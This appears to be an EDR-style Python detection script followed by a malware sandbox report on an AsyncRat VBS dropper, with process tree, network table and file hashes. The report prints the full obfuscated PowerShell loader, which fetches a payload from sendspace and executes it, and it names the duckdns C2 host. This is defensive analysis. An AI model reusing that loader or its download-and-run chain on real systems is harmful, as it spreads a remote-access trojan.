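from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:          # shape of a process-create record (e.g. Sysmon event 1); assumed
    pid: int
    image: str
    command_line: str
    parent_image: str


@dataclass
class ThreadContextEvent:    # EDR record for SetThreadContext on a remote thread; assumed shape
    source_pid: int
    source_image: str
    target_pid: int
    target_image: str


@dataclass
class NetworkEvent:          # DNS answer plus the connection it led to; assumed shape
    domain: str
    dest_ip: str
    dest_port: int


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumed allow-list of processes that legitimately set another process's thread context.
CONTEXT_ALLOWLIST = {"windbg.exe", "devenv.exe"}
# Assumed list of dynamic-DNS providers frequently used for RAT C2.
DYNDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net")
LONG_CMDLINE = 2000


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(evt: ProcessEvent) -> list[tuple[str, str]]:
    hits: list[tuple[str, str]] = []
    name, parent = basename(evt.image), basename(evt.parent_image)
    if parent in SCRIPT_HOSTS and name in POWERSHELL:
        hits.append(("script_host_spawns_powershell", f"{parent} -> {name} (pid {evt.pid})"))
    # The stage-1 command line is thousands of characters long and calls .Invoke( on a
    # method name assembled at runtime; both are rare in administrative scripts.
    if name in POWERSHELL and len(evt.command_line) > LONG_CMDLINE and ".Invoke(" in evt.command_line:
        hits.append(("obfuscated_powershell_cmdline", f"pid {evt.pid}: {len(evt.command_line)}-char command line"))
    # cmd /c "echo %appdata%\..." launched from PowerShell: the dropper resolving its drop path.
    if name == "cmd.exe" and parent in POWERSHELL and re.search(r'/c\s+"?echo\s+%\w+%', evt.command_line, re.I):
        hits.append(("cmd_echo_env_path_resolution", f"pid {evt.pid}: {evt.command_line}"))
    return hits


def check_thread_context(evt: ThreadContextEvent) -> list[tuple[str, str]]:
    src, dst = basename(evt.source_image), basename(evt.target_image)
    if evt.source_pid != evt.target_pid and src not in CONTEXT_ALLOWLIST:
        return [("cross_process_setthreadcontext",
                 f"{src} (pid {evt.source_pid}) -> {dst} (pid {evt.target_pid})")]
    return []


def check_network(evt: NetworkEvent) -> list[tuple[str, str]]:
    domain = evt.domain.lower().rstrip(".")
    if domain.endswith(DYNDNS_SUFFIXES) and evt.dest_port not in (80, 443):
        return [("dyndns_nonstandard_port", f"{domain} -> {evt.dest_ip}:{evt.dest_port}")]
    return []


def evaluate(events: list) -> list[tuple[str, str]]:
    """Run every check over a mixed event stream and return (rule_id, detail) pairs."""
    hits: list[tuple[str, str]] = []
    for evt in events:
        if isinstance(evt, ProcessEvent):
            hits += check_process(evt)
        elif isinstance(evt, ThreadContextEvent):
            hits += check_thread_context(evt)
        elif isinstance(evt, NetworkEvent):
            hits += check_network(evt)
    return hits


# Constructed events mirroring the behavioral1 process tree and network table above.
# The PowerShell command line is shortened to a repeated fragment of the real one.
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(1976, PS64,
                 f'"{PS64}" "$Guttiferae = 1;'
                 + "$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);" * 50 + '"',
                 r"C:\Windows\System32\WScript.exe"),
    ProcessEvent(2101, r"C:\Windows\system32\cmd.exe",
                 r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"', PS64),
    ThreadContextEvent(2820, PS32, 2300, r"C:\Program Files (x86)\windows mail\wab.exe"),
    NetworkEvent("www.sendspace.com", "104.21.28.80", 443),
    NetworkEvent("xvern429.duckdns.org", "12.202.180.134", 8890),
    ProcessEvent(3000, r"C:\Windows\System32\notepad.exe", r'"C:\Windows\System32\notepad.exe"',
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for rule_id, detail in evaluate(SAMPLE_EVENTS):
        print(f"{rule_id:32} {detail}")
```

The cross-process SetThreadContext check is the one worth tuning first: outside debuggers it is almost always injection or hollowing, and here the target is a Microsoft-signed binary that has no business being a child of PowerShell, so a second rule keyed on parent/child image pairs would catch the same step without any thread telemetry.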
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-24 13:15
Reported
2024-05-24 13:17
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
145s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4156 set thread context of 2608 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo 
aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) 
Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. 
Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| BE | 2.17.196.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 171.196.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.sendspace.com | udp |
| US | 104.21.28.80:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n2.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n2.sendspace.com | tcp |
| US | 8.8.8.8:53 | crt.sectigo.com | udp |
| US | 8.8.8.8:53 | 80.28.21.104.in-addr.arpa | udp |
| US | 172.64.149.23:80 | crt.sectigo.com | tcp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.136.31.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| BE | 2.17.196.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 104.21.28.80:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n3.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n3.sendspace.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xvern429.duckdns.org | udp |
| US | 12.202.180.134:8890 | xvern429.duckdns.org | tcp |
| US | 8.8.8.8:53 | 134.180.202.12.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_owbo2hwy.0hv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Absterge.Pig
| MD5 | ce1f757dad7e08f32964a255a380674e |
| SHA1 | 19e38ec002272355856d0f68324c0b18a7a07dc0 |
| SHA256 | 4e0fe5353ac7e82175ab48a53995198157b546bb2eec91ee1d7d63432b710548 |
| SHA512 | ad6b88260234a1abf893680f0332510cd08f9192b6e76478c962203617e689b9cf538f7b2aa44422493d4a80b872a24bcf4258e17a540eaf901a59f37933707e |